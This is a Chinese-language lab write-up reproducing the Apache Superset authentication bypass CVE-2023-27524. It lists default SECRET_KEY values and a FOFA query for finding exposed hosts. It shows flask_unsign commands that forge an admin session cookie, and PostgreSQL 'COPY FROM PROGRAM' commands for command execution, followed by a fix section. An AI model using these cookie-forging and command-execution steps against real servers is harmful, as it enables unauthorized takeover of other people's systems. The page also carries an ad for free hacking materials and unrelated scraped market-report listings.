首页 > 其他分享 >Apache Superset 身份认证绕过漏洞(CVE-2023-27524)

Apache Superset 身份认证绕过漏洞(CVE-2023-27524)

时间:2023-06-20 14:12:38浏览次数:51  
标签:27524 CVE exec 漏洞 session cookie 2023 docker superset

漏洞简介

image

Apache Superset是一个开源的数据可视化和数据探测平台,它基于Python构建,使用了一些类似于Django和Flask的Python web框架。提供了一个用户友好的界面,可以轻松地创建和共享仪表板、查询和可视化数据,也可以集成到其他应用程序中。由于用户在默认安装过程中,未对SECRET_KEY的默认值进行更改,未经身份验证的攻击者通过伪造管理员身份进行访问后台,并通过后台原本数据库执行功能实现命令执行操作。‍

环境搭建

可以通过 fofa 来搜索相关网站

"Apache Superset"

image

这里我们通过 docker 来在本地搭建环境

image

git clone https://github.com/apache/superset.git
cd superset
git checkout 2.0.0
TAG=2.0.0 docker-compose -f docker-compose-non-dev.yml pull
TAG=2.0.0 docker-compose -f docker-compose-non-dev.yml up

官网提供的方法 并没有搭建成功,还是直接在docker 仓库中查找

https://hub.docker.com/r/apache/superset/tags?page=1&ordering=last_updated&name=2.0.0

image

docker pull apache/superset:2.0.0
docker exec -it superset superset fab create-admin --username admin --firstname Superset  --lastname Admin --email [email protected] --password admin
docker exec -it superset superset db upgrade
docker exec -it superset superset load_examples
docker exec -it superset superset init

​漏洞复现

利用脚本检测是否存在漏洞并生成相对应的 cookie

【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

image

访问主页抓取数据包

image

将生成的 session 替换原本的 session

image

成功登录

image

接下来就是想办法 getshell 网络上的文章上是通过后台数据库执行语句来获取权限。

经过复现分析,发现存在的问题还比较多,首先是默认情况下执行语句仅仅支持 SELECT ,需要修改数据库的权限允许其他的一些语句(but 一些版本上是没有对数据库的操作权限的),然后就是获取的权限,本质上也只是获取了数据库的执行权限,数据库有可能并不与 superset 在同一服务器上,再有就是需要数据库本身也需要存在漏洞才可以,我这里选取了 (CVE-2019-9193)PostgreSQL 高权限命令执行漏洞来复现漏洞。

image

image

image

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

image

漏洞分析

感觉这个漏洞有点像前段时间爆出来的 nacos 身份认证绕过漏洞 存在默认的密钥

SECRET_KEYS = [
    b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h',  # version < 1.4.1
    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',          # version >= 1.4.1
    b'thisISaSECRET_1234',                            # deployment template
    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',          # documentation
    b'TEST_NON_DEV_SECRET'                            # docker compose
]

Superset 是用 Python 编写的,基于 Flask Web 框架。基于 Flask 的应用程序的常见做法是使用加密签名的会话 cookie 进行用户状态管理。当用户登录时,Web 应用程序将包含用户标识符的会话 cookie 发送回最终用户的浏览器。Web 应用程序使用 SECERT_KEY 对 cookie 进行签名,该值应该时随机生成的,通常存储在本地配置文件中,对于每个 Web 请求,浏览器都会将已签名的会话 cookie 发送回应用程序,然后应用程序验证 cookie 上的签名以处理请求之前重新验证用户。

整段描述下面我感觉跟 JWT 的相关验证方式差不太多,我们具体来操作看看。

image

首先就是请求的时候我们可以看到 cookie 值 可以解码成功,通过爆破(当然我们这里是已经已知这个 key 值),伪造生成用户的 cookie,替换数据包中的cookie 值,就成功登录成功,之后再次请求的时候,发现我们添加的字段已经被保存在 session 值中

>>> from flask_unsign import session
>>> session.decode("eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiOGUzOTdiZTQ2ZjVlZjJiYTc1NjI4MWQxODE2NTAyMWEzMzcxYjI3OCIsImxvY2FsZSI6ImVuIn0.ZJAEeQ.wVfrGzupbWdw4R1OlzUwUqhGMMY")
{'_fresh': False, 'csrf_token': '8e397be46f5ef2ba756281d18165021a3371b278', 'locale': 'en'}
>>> session.sign({'_user_id': 1, 'user_id': 1},'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET')
'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZJAFNg.oWyP7v-1l0qOHFOMjSd-cFiVQLY'
>>> session.decode(".eJxFzEEOhCAQBMC_9JmDwMZBPkOUaaKRaALuabN_15sPqPohlca-Ipa5dhqkb2dLmyJag9xbSde580CEjoHiQlYOlt4VDVMe3CjTRxYv3i_qGEQsDOqZ58rHPNDgHf83roYh1w.ZJAFVw.IwmWyTU1bvoY2nhlFYdmwXNNtTM")
{'_fresh': False, '_user_id': 1, 'csrf_token': 'd68e728cde01e32fd89c0267947b3733bd2e8771', 'locale': 'en', 'user_id': 1}

image

漏洞修复

拒绝在非调试环境中使用默认密码启动

image

image

更多网安技能的在线实操练习,请点击这里>>

 

标签:27524,CVE,exec,漏洞,session,cookie,2023,docker,superset
From: https://www.cnblogs.com/hetianlab/p/17493495.html

相关文章

  • 电力配电板行业市场现状调研及发展趋势分析报告2023-2029
    2023-2029全球电力配电板行业调研及趋势分析报告2022年全球电力配电板市场规模约66亿元,2018-2022年年复合增长率CAGR约为%,预计未来将持续保持平稳增长的态势,到2029年市场规模将接近91亿元,未来六年CAGR为4.3%。从核心市场看,中国电力配电板市场占据全球约%的市场份额,为全球最主要......
  • 电池接触系统行业市场现状调研及发展趋势分析报告2023-2029
    2023-2029全球电池接触系统行业调研及趋势分析报告2022年全球电池接触系统市场规模约23亿元,2018-2022年年复合增长率CAGR约为%,预计未来将持续保持平稳增长的态势,到2029年市场规模将接近33亿元,未来六年CAGR为4.6%。从核心市场看,中国电池接触系统市场占据全球约%的市场份额,为全球......
  • 便携式室外取暖器行业市场现状调研及发展趋势分析报告2023-2029
    2023-2029全球便携式室外取暖器行业调研及趋势分析报告2022年全球便携式室外取暖器市场规模约21亿元,2018-2022年年复合增长率CAGR约为%,预计未来将持续保持平稳增长的态势,到2029年市场规模将接近30亿元,未来六年CAGR为4.1%。从核心市场看,中国便携式室外取暖器市场占据全球约%的市......
  • 球NTC二极管热敏电阻行业市场现状调研及发展趋势分析报告2023-2029
    2023-2029全球NTC二极管热敏电阻行业调研及趋势分析报告2022年全球NTC二极管热敏电阻市场规模约3.5亿元,2018-2022年年复合增长率CAGR约为%,预计未来将持续保持平稳增长的态势,到2029年市场规模将接近3.9亿元,未来六年CAGR为1.7%。从核心市场看,中国NTC二极管热敏电阻市场占据全球约......
  • 改性聚苯醚IC托盘行业市场现状调研及发展趋势分析报告2023-2029
    2023-2029全球改性聚苯醚IC托盘行业调研及趋势分析报告2022年全球改性聚苯醚IC托盘市场规模约9.1亿元,2018-2022年年复合增长率CAGR约为%,预计未来将持续保持平稳增长的态势,到2029年市场规模将接近13亿元,未来六年CAGR为4.2%。从核心市场看,中国改性聚苯醚IC托盘市场占据全球约%的......
  • 云服务器使用记录-20230620
    三丰云免费云服务器确实是一款值得推荐的云计算服务。它提供了多种类型和多线程的服务,同时也提供高性能、高安全性和高稳定性的云计算服务,非常适合广大用户的需求。使用虚拟主机可以帮助您轻松地管理您的网站和应用程序,并且在处理高流量时具有更好的性能和稳定性。此外,三丰云还提供......
  • 虚拟主机使用记录-20230620
    三丰云提供的免费虚拟主机和免费云服务器对于学生和初学者来说非常有吸引力,并且易于使用。同时,三丰云也提供付费计划,可以为更高级别的用户提供更多资源和功能支持。需要注意的是,免费服务通常会受到一些限制和局限性。因此,在选择免费主机或云服务器时,需要根据实际需求进行评估,以确保......
  • Apache Superset 身份认证绕过漏洞(CVE-2023-27524)
    漏洞简介ApacheSuperset是一个开源的数据可视化和数据探测平台,它基于Python构建,使用了一些类似于Django和Flask的Pythonweb框架。提供了一个用户友好的界面,可以轻松地创建和共享仪表板、查询和可视化数据,也可以集成到其他应用程序中。由于用户在默认安装过程中,未对SECRET_KEY的默......
  • 20230410 java.util.HashMap
    问题第一部分,基础入门:1.数组的优势/劣势2.链表的优势/劣势3.有没有一种方式整合两种数据结构的优势?散列表4.散列表有什么特点?5.什么是哈希?第二部分,HashMap原理讲解:1.HashMap的继承体系是什么样的?2.Node数据结构分析?3.底层存储结构介绍?4.put数据原理分析?5.什么是Hash碰......
  • 20230411 java.lang.Iterable
    介绍publicinterfaceIterable<T>实现此接口允许对象成为“for-each循环”语句的目标//遍历集合for(Suitsuit:suits)//遍历数组for(inti:a)只有一个抽象方法iterator,是函数式接口方法iterator返回迭代器forEach对Iterable的每个元素执行给......